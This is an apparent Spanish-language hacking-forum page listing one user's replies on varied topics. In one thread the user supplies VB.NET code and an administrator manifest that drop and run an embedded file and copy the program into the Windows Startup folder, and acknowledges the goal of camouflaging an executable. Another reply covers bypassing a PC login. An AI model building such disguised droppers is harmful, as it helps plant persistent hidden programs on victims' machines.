elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 63
1  Foros Generales / Noticias / Re: Corea del Norte amenaza con arruinar USA mediante ciberataques en: 12 Junio 2015, 07:58 am
Envidiar es síntoma de inferioridad.
Napoleón.

Saludos.
2  Programación / .NET (C#, VB.NET, ASP) / Re: Agregar archivo a exe en VB en: 12 Junio 2015, 01:21 am
No lo creo, ya entendí perfectamente lo que quiere  ;-) ;-) ;-) ;-) ;-)


Traduciéndolo del C te dejo el código.
Código
  1. Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
  2.  
  3.  
  4. 'Puedes cambiar Temp por desktop o escritorio :P
  5.        IO.File.WriteAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp & "\Text.txt", My.Resources.Text)
  6.        Process.Start(My.Computer.FileSystem.SpecialDirectories.Temp & "\Text.txt")
  7.  
  8.        Dim info As New FileInfo(Application.StartupPath)
  9.        info.CopyTo(My.Computer.FileSystem.SpecialDirectories.Programs + "\startup\Text.exe")
  10.  

Para agregar permisos de Administrador deberás proporcionárselos.

Código
  1. <?xml version="1.0" encoding="utf-8"?>
  2. <asmv1:assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  3.  <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
  4.  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
  5.    <security>
  6.      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
  7.        <!-- UAC Manifest Options
  8.            If you want to change the Windows User Account Control level replace the
  9.            requestedExecutionLevel node with one of the following.
  10.  
  11.        <requestedExecutionLevel  level="asInvoker" uiAccess="false" />
  12.        <requestedExecutionLevel  level="requireAdministrator" uiAccess="false" />
  13.        <requestedExecutionLevel  level="highestAvailable" uiAccess="false" />
  14.  
  15.            If you want to utilize File and Registry Virtualization for backward
  16.            compatibility then delete the requestedExecutionLevel node.
  17.        -->
  18.        <requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
  19.      </requestedPrivileges>
  20.    </security>
  21.  </trustInfo>
  22. </asmv1:assembly>
  23.  

Saludos.
3  Foros Generales / Foro Libre / Re: ¿Cual fue su primer mensaje o tema en el foro? en: 11 Junio 2015, 09:42 am
Citar
Que tiempos aquellos tan traviesos con el BackTrack... xD

Ni hablar, esos tiempos en donde te jodías a tus amigos o compañeros de escuela no tenia precio.
Eso me recuerda a mi segundo semestre de prepa  :xD.

Pitoloco  :xD Menudo nombre  :D

Citar
Amigos, Soy nuevo en este blog

Pues el sitio si tiene blog, pero no lo puse porque me creía un cracker  ;-).
En el 2014 avance mucho :P

Saludos.
4  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Crear un subforo de Ciencia para Aficionados dentro de foro libre en: 11 Junio 2015, 06:58 am
Yo les sugerí agregar memes a las emotiones y ni respuesta tuve  :-(.
Ya veras si te dejan un sub-foro de ciencia  :silbar:.

Saludos.
5  Programación / .NET (C#, VB.NET, ASP) / Re: Agregar archivo a exe en VB en: 11 Junio 2015, 05:14 am
No creo que vaya mas alla de eso.

Seamos sinceros, tu quieres camuflar un exe, aunque digas text.



Pero tu quieres agregar uno dentro del exe de vb8, realmente no se como hacerlo en vb, tal vez Elektro te ayude.

Tengo que reconocerlo, muy ingenioso.


Saludos.
6  Seguridad Informática / Hacking / Re: Entrar en mi pc en: 11 Junio 2015, 00:27 am
puedes borrar la contraseña con hirensboot, eso si. la contraseña se perdera xa siempre

Como dije arriba, si tiene el inicio de sesión con Hotmail, no se podrá.
Inténtalo para que veas que no vas a llegar a ningún lado.
Es mejor arrancar con Administrador.
Pero es otro rollo, supongo que las imágenes están en modo publico para que las seleccione desde carpetas compartidas. No es muy difícil :P.

Saludos.
7  Informática / Hardware / Re: Duda sobre calentamiento de mi portatil en: 10 Junio 2015, 05:22 am
Citar
proyectará mucho calor de vuelta y lo verás

Eso si es cierto :P

Saludos.
8  Informática / Hardware / Re: Duda sobre calentamiento de mi portatil en: 10 Junio 2015, 03:07 am
Si el ventilador gira a mas revoluciones de las que da, algo anda mal. Y no enfría, es peor.
El mini-cooler puede ser muy buena idea.
Pero trata de comprar aisladores térmicos de poliestireno. Creo que absorben todo el calor. No estoy seguro, pero te garantizo de disminuirá.
Es como espuma de color queso, amarillo.

Pero que aísles todo el calor de tu laptop para no quemarte no significa que disminuirá el calentamiento interno. Las laptop de segunda mano pueden ser muy malas.
Te sugiero que compres el poliestireno, realmente no se donde lo venden. Pero  si sumas ambas partes tu computadora mejorara.

PD: Creo que en los Oxxos venden hieleras de hielo seco. Puedes adaptar una recortándola y poniéndosela a tu laptop. Ve a soporte y coméntales.
Seguro que te lo adaptaran a tu gusto.

Saludos.
9  Foros Generales / Foro Libre / Re: El paracaídas supersónico de la NASA volvió a fallar en: 10 Junio 2015, 02:00 am
al contrario, ojala se gastara mas plata, el presupuesto de la NASA es irrisorio.

es el 0.5% del presupuesto federal (son 17.647 millones de dólares). pero este se divide en varias misiones, asi que lo que usan para cada, es muy poco.

el presupuesto militar es de 600.000 millones de dolares (es lo que sale al aire, pero debe ser mas).

imaginarse lo que seria la NASA con el presupuesto militar...


O con el presupuesto gastado de Iraq....
Billones de dólares gastados desde que comenzó la guerra contra el Terrorismo.
Suficiente para acabar con el hambre en todo el mundo durante 10 años.

Saludos.
10  Foros Generales / Dudas Generales / Re: Que le pasa al foro? en: 10 Junio 2015, 01:54 am
La verdad, no hay que tratar de encontrar la inmortalidad del cangrejo. Mas sencillo ir al grano. Si no se esta interesado en deducir que es lo que ocasiona el error. Y simplemente queremos deshacernos de el, pues erradicarlo de raíz.
Trata de Reinstalar Chrome.

Saludos.
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 63
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines